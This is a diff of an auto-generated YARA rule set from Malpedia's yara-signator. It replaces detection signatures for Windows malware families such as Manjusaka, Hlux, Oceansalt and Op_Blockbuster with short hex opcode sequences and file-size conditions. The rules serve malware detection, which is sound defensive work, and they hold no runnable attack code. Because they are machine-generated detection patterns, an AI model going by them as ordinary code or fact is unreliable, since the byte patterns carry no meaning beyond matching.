-		logic_hash = "5b9405aaca8472dd7d7babc873d4fa797ade7b01d47ace52674d0f1fda5d55c6"
+		logic_hash = "13abde176c0dbe626f8e6b9e0859b33d03f906fc80a16b44518b3026f31a5776"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140904,32 +140664,38 @@ rule MALPEDIA_Win_Sunorcal_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 5b c21000 8b442404 8b00 813863736de0 752a 83781003 }
-		$sequence_1 = { 6a03 e8???????? cc 55 8bec 83ec0c }
-		$sequence_2 = { 6a03 e8???????? cc 55 8bec 83ec0c a1???????? }
-		$sequence_3 = { 68b7000000 ff15???????? 6a64 68???????? 6a67 }
-		$sequence_4 = { 68???????? ff15???????? 33c0 c3 c3 55 8bec }
-		$sequence_5 = { ff15???????? 68b7000000 ff15???????? 6a64 68???????? }
-		$sequence_6 = { ff15???????? 6a03 e8???????? cc 55 8bec 83ec0c }
-		$sequence_7 = { c21000 8b442404 8b00 813863736de0 752a 83781003 7524 }
-		$sequence_8 = { c21000 8b442404 8b00 813863736de0 }
-		$sequence_9 = { 7c02 eb0e e8???????? e8???????? 85c0 }
+		$sequence_0 = { 51 ff15???????? 8b550c 8902 8b450c 833800 742b }
+		$sequence_1 = { 51 8b5510 8b02 50 e8???????? 83f8ff 7507 }
+		$sequence_2 = { 895108 8b4538 89410c 8b553c 895110 8b4528 50 }
+		$sequence_3 = { 8b45e4 8945c0 eb07 c745c000000000 }
+		$sequence_4 = { 833d????????00 0f85ab000000 c645dc53 c645dd48 }
+		$sequence_5 = { 81ec3c010000 6804010000 8d85e0feffff 50 6a00 ff15???????? }
+		$sequence_6 = { 8d4310 8d89245b4100 5a 668b31 41 668930 41 }
+		$sequence_7 = { e9???????? c645cc44 c645cd41 c645ce54 }
+		$sequence_8 = { 8b701c 8bcf e8???????? 8b4c240c 0fb711 }
+		$sequence_9 = { c74424104c6f6164 c74424144c696272 c744241861727941 8974241c ff15???????? 8bc8 }
+		$sequence_10 = { 8b4d18 8d7520 e8???????? 83c418 85c0 }
+		$sequence_11 = { 8b0d???????? 51 e8???????? 8b442430 8b542414 8910 83c404 }
+		$sequence_12 = { ff15???????? a3???????? 8b542448 6a40 6800300000 52 6a00 }
+		$sequence_13 = { 3bc5 7d08 5d 33c0 5b 83c418 }
+		$sequence_14 = { 85c0 750d 8b442418 e8???????? 85c0 }
+		$sequence_15 = { 81c408010000 c3 8bff 55 8bec }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Nightshade_C2_Auto : FILE
+rule MALPEDIA_Win_Manjusaka_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "506408db-305c-5339-b348-c82ff40c922a"
+		id = "51e0b6e1-e568-5f67-9420-ee9d6d4c7f64"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nightshade_c2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nightshade_c2_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.manjusaka"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.manjusaka_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "73549f59f11fbc1afdb3ccb5b45ff5a2e04bde2ab7c3c97f1567af6c297191aa"
+		logic_hash = "29c4c663bca03e2a4622112f8201d75001eddf5ba4fdd44c2a396a51b4263dae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140943,32 +140709,32 @@ rule MALPEDIA_Win_Nightshade_C2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744243000000000 488b842438010000 4889442428 89542420 448bcf 4533c0 33d2 }
-		$sequence_1 = { c744242000000000 eb0b 8b442420 83c002 89442420 8b842480000000 39442420 }
-		$sequence_2 = { 488b4c2458 ff15???????? 90 48837c247000 740c 488b4c2470 ff15???????? }
-		$sequence_3 = { 8b442458 89442428 488b442460 4889442420 448b4c2454 4c8b442470 33d2 }
-		$sequence_4 = { 8b0c24 486bc903 488b542408 0fb60c0a 81e1ff000000 0bc1 8b0c24 }
-		$sequence_5 = { ff15???????? ff15???????? 90 488b442440 488bc8 e8???????? 90 }
-		$sequence_6 = { 48638424b8000000 488b8c24b0000000 4803c8 488bc1 4889442430 c744244400000000 eb0b }
-		$sequence_7 = { 85c0 7479 488b542438 488d0d0ce50100 e8???????? 85c0 }
-		$sequence_8 = { ff15???????? 85c0 7505 e9???????? 41b810000000 488d9424b8000000 488b4c2448 }
-		$sequence_9 = { 8b442424 8b4c2460 2bc8 8bc1 3dffff0000 7e0a c7442420ffff0000 }
+		$sequence_0 = { 488b4110 4885c0 0f8482000000 488b31 486bf870 31db 48837c1e0800 }
+		$sequence_1 = { 8be9 2bef 4803fa 399c2490000000 7417 498b4d70 e8???????? }
+		$sequence_2 = { f048ff08 750d 488d8c2438010000 e8???????? 80bc24c801000002 740d 488d8c2440010000 }
+		$sequence_3 = { 85c0 750e b9667b0200 e8???????? 8bc8 ebe2 488b4b18 }
+		$sequence_4 = { ba08000000 e8???????? 0f0b 488d4134 c3 488d4135 c3 }
+		$sequence_5 = { 81fa00fc0000 7323 66c741100100 6644894112 48c1e010 4883c801 c3 }
+		$sequence_6 = { e8???????? 4885d2 7415 4c39e8 7509 4c39e2 0f846a010000 }
+		$sequence_7 = { 8a8c0ca2000000 41300c2f 488d4d01 4889cd 4939cc 75b8 488b442440 }
+		$sequence_8 = { f048ff00 0f8e64050000 4889c7 b930000000 ba08000000 e8???????? 4885c0 }
+		$sequence_9 = { 8806 4883c440 5e c3 4889d1 4c89c2 4d89c8 }
 
 	condition:
-		7 of them and filesize < 458752
+		7 of them and filesize < 4772864
 }
-rule MALPEDIA_Win_Bedep_Auto : FILE
+rule MALPEDIA_Win_Hlux_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6ea06871-a8ca-5ce7-b9c2-106c128847d6"
+		id = "d4c2052b-0cd7-527b-912e-2b962734b611"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bedep"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bedep_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hlux"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hlux_auto.yar#L1-L158"
 		license_url = "N/A"
-		logic_hash = "16b76a62133391f06cc2c61f0e60ca33efb0a31528884eb23ddb66df3319299d"
+		logic_hash = "779cc27c2a832f57ff4dea76d2b777f85d6a15f93d14c3ef1d8885e9224660be"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -140982,32 +140748,38 @@ rule MALPEDIA_Win_Bedep_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a02 5f 397df0 7e03 895dfc 837d0800 741f }
-		$sequence_1 = { 8d45a4 50 ff7508 8975fc e8???????? }
-		$sequence_2 = { e8???????? 8bf0 85f6 59 743c 8a45e0 832600 }
-		$sequence_3 = { eb54 53 6878020000 8d8580fdffff 50 6a01 ff75f8 }
-		$sequence_4 = { 85c9 7410 3bd1 740c 8b09 85c9 }
-		$sequence_5 = { 740b 8d442410 50 ff15???????? 8bc7 5f 5e }
-		$sequence_6 = { e8???????? 8bf0 f7c67fffffff 7729 ff7508 e8???????? 3bf3 }
-		$sequence_7 = { 8b4c2414 8b463c c644240f01 ff742418 ff742420 ff7644 6a01 }
-		$sequence_8 = { 40 85c9 7c08 668b4b0c 66014b0a 66894308 5f }
-		$sequence_9 = { ff7638 ff742438 50 8d442450 50 ff742438 8d442438 }
+		$sequence_0 = { 7406 899d44ffffff 09c9 7506 898d9cfeffff 83ffd6 }
+		$sequence_1 = { 7503 895598 8b9decfeffff 8d0b 09db }
+		$sequence_2 = { 0009 1b4e01 e405 9d }
+		$sequence_3 = { 0088aa4b0023 d18a0688078a 46 018847018a46 }
+		$sequence_4 = { 0000 008365f0fe8b 4d 0883c108e918 }
+		$sequence_5 = { 0130 8b13 8b08 85d2 }
+		$sequence_6 = { 33db 81f926edf50a 742f 8d144b 8d8c8b9948a5f2 8955f0 83f909 }
+		$sequence_7 = { 7534 85c9 7430 83f9f4 }
+		$sequence_8 = { bba43c0cdb 8b15???????? 8955c4 895de0 83f8c1 7503 8945d8 }
+		$sequence_9 = { 010f 840f 0000 008365f0fe8b }
+		$sequence_10 = { 0104bb 8d1447 89542418 e9???????? }
+		$sequence_11 = { 0101 c9 c3 6a10 }
+		$sequence_12 = { 0104b9 33c9 83c408 85c0 }
+		$sequence_13 = { 898d84feffff 8b0d???????? 8b1d???????? 899d0cffffff }
+		$sequence_14 = { 83f8a6 7406 89851cffffff 8b1d???????? 895df4 8b3d???????? }
+		$sequence_15 = { 89bd64ffffff 09c0 750b 83f8c1 7406 }
 
 	condition:
-		7 of them and filesize < 557056
+		7 of them and filesize < 3147776
 }
-rule MALPEDIA_Win_Lowball_Auto : FILE
+rule MALPEDIA_Win_Oceansalt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "54da57b9-ab1c-5339-aa9f-22bb43699408"
+		id = "02715696-fd80-57ea-b24d-396ae324dbb5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lowball_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oceansalt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oceansalt_auto.yar#L1-L171"
 		license_url = "N/A"
-		logic_hash = "6556d6fae2a4a8629aa4a1cdf4ec37ace65e626c581801de62deac1b596c79de"
+		logic_hash = "02d347ca93ad6009e5025efa6ae57d6d731ae049bbef6bfc036d024dce1ca79a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141021,19 +140793,25 @@ rule MALPEDIA_Win_Lowball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 0f848d000000 8d842434070000 68???????? }
-		$sequence_1 = { 8d4b01 51 e8???????? 56 }
-		$sequence_2 = { 85f6 89742410 0f84bf000000 8b8c241c020000 }
-		$sequence_3 = { 6810270000 ff15???????? bf???????? 83c9ff }
-		$sequence_4 = { 0f840c010000 8b8c2424020000 53 55 55 }
-		$sequence_5 = { 896c2418 c744242400020000 aa e8???????? 55 }
-		$sequence_6 = { 84c0 750b 33c0 81c4400e0000 c21000 }
-		$sequence_7 = { 68???????? e8???????? 83c410 85c0 0f848d000000 8d842434070000 }
-		$sequence_8 = { 85c0 752d 68b80b0000 ffd3 8d84242c050000 8d8c241c010000 50 }
-		$sequence_9 = { 8b742420 53 ff15???????? 5b 56 ff15???????? 8b44240c }
+		$sequence_0 = { 56 8b7508 57 6a00 6804020000 8d85f8f9ffff 50 }
+		$sequence_1 = { 0f8492000000 53 6a00 6a00 6a00 6802000008 }
+		$sequence_2 = { 50 56 ffd3 6a00 6880000000 6a02 }
+		$sequence_3 = { 8b4508 6a00 52 57 50 }
+		$sequence_4 = { 6a07 8d45f4 50 56 c645f400 ff15???????? 6a00 }
+		$sequence_5 = { 85c9 7e0d 80b405fcfdffff77 40 3bc1 7cf3 56 }
+		$sequence_6 = { 85ff 743c 6a00 56 }
+		$sequence_7 = { 83c404 85c0 75ce 8b8dc4fdffff }
+		$sequence_8 = { 8be8 85c0 0f841e010000 48899c24a8010000 }
+		$sequence_9 = { 442b44247c 41c1e80a e8???????? f644246010 740a }
+		$sequence_10 = { 4c8d0d2ba3ffff 41bb00020000 408a2f 413aea 0f8524f9ffff 4438942490000000 }
+		$sequence_11 = { bb00080000 3918 0f4c18 bf01000000 3bcb 0f8d8d000000 4c8d35f4c60000 }
+		$sequence_12 = { 4883c440 5d c3 4055 4883ec20 488bea 488b01 }
+		$sequence_13 = { eb4e 488b0d???????? 488d542434 e8???????? eb3b }
+		$sequence_14 = { e8???????? 4c8d9c2470060000 498b6b20 498b7328 498be3 }
+		$sequence_15 = { 488d0d54e30000 f6410820 7417 33d2 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 212992
 }
 rule MALPEDIA_Win_Fickerstealer_Auto : FILE
 {
@@ -141074,57 +140852,18 @@ rule MALPEDIA_Win_Fickerstealer_Auto : FILE
 	condition:
 		7 of them and filesize < 598016
 }
-rule MALPEDIA_Win_Kazyloader_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e63e9d7-0aa3-54bc-8958-5bb44d9fbb2a"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazyloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kazyloader_auto.yar#L1-L124"
-		license_url = "N/A"
-		logic_hash = "34cc9a0cb8805c010ff93ad518256fe67686f6553b5dc947370b69715033db6f"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { d2 9c 07 06 8e }
-		$sequence_1 = { 1309 1109 3a3fffffff 02 09 6f2700000a }
-		$sequence_2 = { 6f1a00000a 281b00000a 26 00 de00 }
-		$sequence_3 = { 8e 69 58 280100002b }
-		$sequence_4 = { 00 08 16 06 06 8e 69 }
-		$sequence_5 = { 00 1104 02 6f1f00000a 5a 1105 }
-		$sequence_6 = { 6f1400000a 740200001b 0c 1200 06 8e 69 }
-		$sequence_7 = { 58 91 1308 1108 20fd000000 59 }
-		$sequence_8 = { 282100000a 00 02 08 19 02 6f2200000a }
-		$sequence_9 = { 07 04 2804000006 0b 07 281200000a 6f1800000a }
-
-	condition:
-		7 of them and filesize < 50176
-}
-rule MALPEDIA_Win_Atlas_Agent_Auto : FILE
+rule MALPEDIA_Win_Magala_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "12437137-122e-5647-b916-3934d94f17a9"
+		id = "7d1b8c98-54ed-55c3-acdc-c42ca1617fa1"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atlas_agent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atlas_agent_auto.yar#L1-L144"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magala"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.magala_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "bddbc52b224832b6d1899d8a7f9c2269559750eebdc1985f06284557268eff24"
+		logic_hash = "3f293fe262d0ce646006496753cf31d4b0409f545d9ecd746ba425bd758b2984"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141138,36 +140877,32 @@ rule MALPEDIA_Win_Atlas_Agent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fb60c0a 83e13c c1f902 03c1 }
-		$sequence_1 = { 8bc1 99 b903000000 f7f9 c1e002 }
-		$sequence_2 = { 8a80c0ba0410 84c0 7f1f 8bce }
-		$sequence_3 = { 8a55fe 8810 8d4508 50 }
-		$sequence_4 = { 8a55f3 8855f1 0fb645f1 85c0 746c 68???????? 8d4dd8 }
-		$sequence_5 = { 8a5de3 8b0495e0b50410 885c012e 8b0495e0b50410 }
-		$sequence_6 = { 57 4883ec20 8bfa 4c8d0d517f0100 }
-		$sequence_7 = { 57 4883ec20 488d1daf180300 488d3da8180300 eb12 488b03 }
-		$sequence_8 = { 57 4883ec20 8bda 4c8d0d35810100 }
-		$sequence_9 = { 57 4883ec20 8bf9 e8???????? 4885c0 7509 488d0533ed0200 }
-		$sequence_10 = { 8a55ff 8810 8b45ec 83c001 }
-		$sequence_11 = { 57 4883ec20 4c8bda 488d2d5737fdff }
-		$sequence_12 = { 8a55ff 8811 8b45f4 50 e8???????? 83c404 8945f0 }
-		$sequence_13 = { 57 4883ec20 488d1ddb180300 488d3dd4180300 }
+		$sequence_0 = { 50 57 8d0451 e9???????? 8b4614 3bf7 746d }
+		$sequence_1 = { c745ec07000000 668945d8 e8???????? 837dec08 8d4dc4 6a04 51 }
+		$sequence_2 = { 50 8d8dd0fdffff e8???????? 6a1f 68???????? }
+		$sequence_3 = { 8da5f4feffff 8b4df4 64890d00000000 59 5f }
+		$sequence_4 = { 83bd8cfdffff00 7435 51 8d8d94fdffff e8???????? }
+		$sequence_5 = { e8???????? 83c404 ffd6 2bc7 3de0930400 76cf 68???????? }
+		$sequence_6 = { 56 8bf1 8b4e10 3bca 0f8214020000 8b450c 53 }
+		$sequence_7 = { c745c000000000 8b08 50 ff5108 8b45b8 8d55c0 }
+		$sequence_8 = { 6a00 8bcf e8???????? 8b4db4 85c9 7444 ff75b0 }
+		$sequence_9 = { 85db 744e 8bcb 8d5101 6690 8a01 }
 
 	condition:
-		7 of them and filesize < 857088
+		7 of them and filesize < 589824
 }
-rule MALPEDIA_Win_Vapor_Rage_Auto : FILE
+rule MALPEDIA_Win_Farseer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1d14d0da-1333-54f1-9dbb-f6aece783656"
+		id = "a66e9913-f269-5edc-a360-d1e8d3201a95"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vapor_rage_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.farseer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.farseer_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "4db758774b2d4194695ce32a1e8b4b65a9381f513267f8540ab016f72cc37d62"
+		logic_hash = "a0cc6c15e80fbd6ad14902af9a89ab7d523ee3b95c547b4caf6b73d387698705"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141181,34 +140916,34 @@ rule MALPEDIA_Win_Vapor_Rage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { f2e94e030000 55 8bec 5d e9???????? 55 }
-		$sequence_1 = { 8d450c 50 8b4d08 51 6a02 ff15???????? 85c0 }
-		$sequence_2 = { 6a00 8d55ec 52 8b45d4 }
-		$sequence_3 = { 8d55ec 52 8b45d4 50 6a05 8b4de4 51 }
-		$sequence_4 = { c3 3b0d???????? f27502 f2c3 f2e94e030000 }
-		$sequence_5 = { 6a03 6a00 6a00 0fb755b0 52 }
-		$sequence_6 = { 50 8b4d08 51 6a02 ff15???????? 85c0 }
-		$sequence_7 = { 3b0d???????? f27502 f2c3 f2e94e030000 55 }
-		$sequence_8 = { ff15???????? 8b4df8 81c900010000 894df8 8b55f8 81ca80000000 }
-		$sequence_9 = { 83c404 8945c4 8b45c4 8945d0 }
+		$sequence_0 = { 8b46f4 8b4804 c74431f49c064200 8b56fc 8b4204 c74430fc???????? 8b4ef4 }
+		$sequence_1 = { 8b4d0c 8bfb e8???????? 8b4c2414 8b3d???????? }
+		$sequence_2 = { 68???????? 8d4c2440 c74424580f000000 c744245400000000 c644244400 e8???????? }
+		$sequence_3 = { 8b7d14 8bc7 3bc7 7300 8bd7 83ff01 7205 }
+		$sequence_4 = { 51 c78424a000000002000000 e8???????? 68???????? 8d542450 52 }
+		$sequence_5 = { ffd5 85c0 7e2f 03f0 81fe00040000 7ce1 33c0 }
+		$sequence_6 = { 6a00 51 c684241409000000 e8???????? 83c40c 8dbc2408090000 }
+		$sequence_7 = { ff15???????? 6804010000 8d54245a b901000000 52 }
+		$sequence_8 = { 8d048520634200 83e31f 8985e4efffff 8b00 c1e306 03c3 8a4824 }
+		$sequence_9 = { 64890d00000000 59 5f 5e 5d 5b 8b8c24a0020000 }
 
 	condition:
-		7 of them and filesize < 296960
+		7 of them and filesize < 347328
 }
-rule MALPEDIA_Win_Zeroaccess_Auto : FILE
+rule MALPEDIA_Win_Op_Blockbuster_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b43bafa0-7845-5d97-89eb-71fc1e8384a0"
+		id = "3b7f0c30-0206-5506-9bf8-8eb817cff417"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeroaccess"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeroaccess_auto.yar#L1-L139"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.op_blockbuster_auto.yar#L1-L322"
 		license_url = "N/A"
-		logic_hash = "58e6fa201d2edf5394810209f43ab6a140ff615859a9e38ec78386b3f1a7fa21"
+		logic_hash = "ef3bbaff4dfd2be69511dd31c3bf7441917e62af8119f46abb34c10cb6a977e8"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -141220,36 +140955,56 @@ rule MALPEDIA_Win_Zeroaccess_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 85c0 7408 ff15???????? eb02 }
-		$sequence_1 = { 8b01 ff761c ff7618 ff5004 }
-		$sequence_2 = { 50 68???????? 6889001200 8d45fc }
-		$sequence_3 = { 6a01 8d45f4 50 ff7608 ff15???????? }
-		$sequence_4 = { 48 83c9ff c744242804000000 48 }
-		$sequence_5 = { 3bf8 730e 2bc7 e8???????? }
-		$sequence_6 = { 68060000c8 ff7708 ff15???????? 85c0 }
-		$sequence_7 = { 6a10 68???????? 68060000c8 ff7708 }
-		$sequence_8 = { 740c bf03000040 eb05 bf010000c0 85ff }
-		$sequence_9 = { 3bc1 7604 83c8ff c3 }
-		$sequence_10 = { ff15???????? 85c0 7407 b8e3030000 }
-		$sequence_11 = { 89742438 897c2448 e8???????? 48 }
-		$sequence_12 = { eb06 ff15???????? 48 8b9520020000 4c }
-		$sequence_13 = { 85c0 750c 8d7808 e8???????? ffcf 75f7 833d????????06 }
+		$sequence_0 = { c701???????? 8b497c 85c9 7407 51 }
+		$sequence_1 = { 57 683c400000 6a40 ff15???????? }
+		$sequence_2 = { e8???????? 85c0 7407 83f802 }
+		$sequence_3 = { ff15???????? 6808400000 6a40 ff15???????? }
+		$sequence_4 = { 56 e8???????? 68???????? 56 a3???????? e8???????? 83c440 }
+		$sequence_5 = { f3ab 66ab aa 5f 85f6 5e }
+		$sequence_6 = { 8a08 80f920 7505 83c021 }
+		$sequence_7 = { 8d45fc 6a04 50 57 ff15???????? }
+		$sequence_8 = { 85c0 7412 68???????? 50 e8???????? 59 a3???????? }
+		$sequence_9 = { 56 50 8d45fc 6a04 }
+		$sequence_10 = { 3c70 7f04 0409 eb06 }
+		$sequence_11 = { 3c69 7c08 3c70 7f04 }
+		$sequence_12 = { 8bf0 ff15???????? 85f6 7404 85c0 }
+		$sequence_13 = { 4863c1 48ffc7 448bc2 88940460010000 0fb607 84c0 }
+		$sequence_14 = { 33c0 8bf8 488d8dd0020000 4863df ff15???????? 488d4c3302 488d95d0020000 }
+		$sequence_15 = { a3???????? 5e c3 68???????? ff15???????? 85c0 7412 }
+		$sequence_16 = { 57 e8???????? 56 e8???????? 83c414 b801000000 }
+		$sequence_17 = { 666666660f1f840000000000 0fb603 48ffc3 884419ff 84c0 75f2 488d9580010000 }
+		$sequence_18 = { 488d8d11010000 33d2 41b803010000 c6851001000000 e8???????? 4533e4 488d542460 }
+		$sequence_19 = { 8bc6 5f 5e c3 33c0 6a00 }
+		$sequence_20 = { 6a00 ff15???????? 8bf8 85ff 7504 5f 5e }
+		$sequence_21 = { 89442440 888424c0020000 e8???????? 488d9424c0020000 }
+		$sequence_22 = { c3 56 53 6a01 57 e8???????? }
+		$sequence_23 = { c3 33c0 ebf8 53 33db 391d???????? 56 }
+		$sequence_24 = { 0fb607 48ffc1 84c0 75ea 803f20 740a }
+		$sequence_25 = { 68???????? 56 e8???????? 56 e8???????? 83c438 }
+		$sequence_26 = { 897de0 394508 7c1f 3934bdd8974400 }
+		$sequence_27 = { 83e03f c1ff06 6bd830 8b04bdd8974400 f644032801 }
+		$sequence_28 = { 6bc830 8b0495d8974400 8b440818 83f8ff 7409 83f8fe 7404 }
+		$sequence_29 = { 50 68???????? 6a05 8d856cffffff 57 50 }
+		$sequence_30 = { 8bcb 8d84240c0c0000 83e103 50 }
+		$sequence_31 = { c745d403000000 8975d8 8b08 52 }
+		$sequence_32 = { 8d85e0fdffff d1fe 4e 56 50 }
+		$sequence_33 = { e8???????? 6800040000 56 ff742414 ff15???????? 5f }
 
 	condition:
-		7 of them and filesize < 464896
+		7 of them and filesize < 74309632
 }
-rule MALPEDIA_Win_Glitch_Pos_Auto : FILE
+rule MALPEDIA_Win_Echo_Gather_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c93e3d6a-335e-54cb-bdcc-97351033393c"
+		id = "7335def2-506d-5260-8b0d-ff3650457aaa"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.glitch_pos_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.echo_gather"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.echo_gather_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "21a834f4b54c4ad338d28c072f57ab5cdab3b8ecf8da5350f54289b7483fd1b9"
+		logic_hash = "b9e20804863a93244aef376504c1242a73dc60c7321ec31adf915aed9161664d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -141263,32 +141018,32 @@ rule MALPEDIA_Win_Glitch_Pos_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b00 ff7508 ff9010030000 50 8d45c4 50 e8???????? }
-		$sequence_1 = { 8b4508 8b4034 83c001 0f80b9060000 8b4d08 894134 8b4508 }
-		$sequence_2 = { 8b00 ff7508 ff902c070000 6683bd2cffffffff 0f85f7030000 8b4508 8b00 }
-		$sequence_3 = { e8???????? 8945dc 8d45e0 50 8b450c 668b00 }
-		$sequence_4 = { 50 8b8554ffffff 8b00 ffb554ffffff ff5054 }
-		$sequence_5 = { 668985f0feffff 8d8568ffffff 50 8d8578ffffff 50 8d4598 50 }
-		$sequence_6 = { 8d4588 50 8b856cffffff 8b00 ffb56cffffff ff90d8000000 }
-		$sequence_7 = { ffb5dcfeffff e8???????? 89852cfeffff eb07 83a52cfeffff00 8b45c0 }
-		$sequence_8 = { 83658000 8d45dc 50 8d45d8 50 8d45e0 }
-		$sequence_9 = { ff75d8 e8???????? dc9d68ffffff dfe0 }
+		$sequence_0 = { 4989d9 4d89fc 488b5c2430 4c8b7c2438 4589f0 4183fe39 0f8451030000 }
+		$sequence_1 = { 488b45d8 4889c1 488b05???????? ffd0 e9???????? 8b45bc }
+		$sequence_2 = { 74c4 b920000000 e8???????? 8b4324 83c001 894324 4183ed01 }
+		$sequence_3 = { 48898424f8040000 488b842450040000 4889842400050000 66c78424e00400000000 e8???????? 4889c2 488b4d10 }
+		$sequence_4 = { 743f 48c1ea20 7539 4883eb01 4889da e8???????? 85c0 }
+		$sequence_5 = { 7561 4181fd7a000780 7409 4181fd26000780 75b4 }
+		$sequence_6 = { 0f94c0 84c0 744a 8b45ec 89c0 4889c2 b940000000 }
+		$sequence_7 = { 48c78424a800000011000000 c78424bc00000000000000 eb31 8b8424bc000000 4898 488b54c420 488b4510 }
+		$sequence_8 = { 488d8c2450010000 488d942450020000 488d842450030000 4989c8 4889c1 e8???????? }
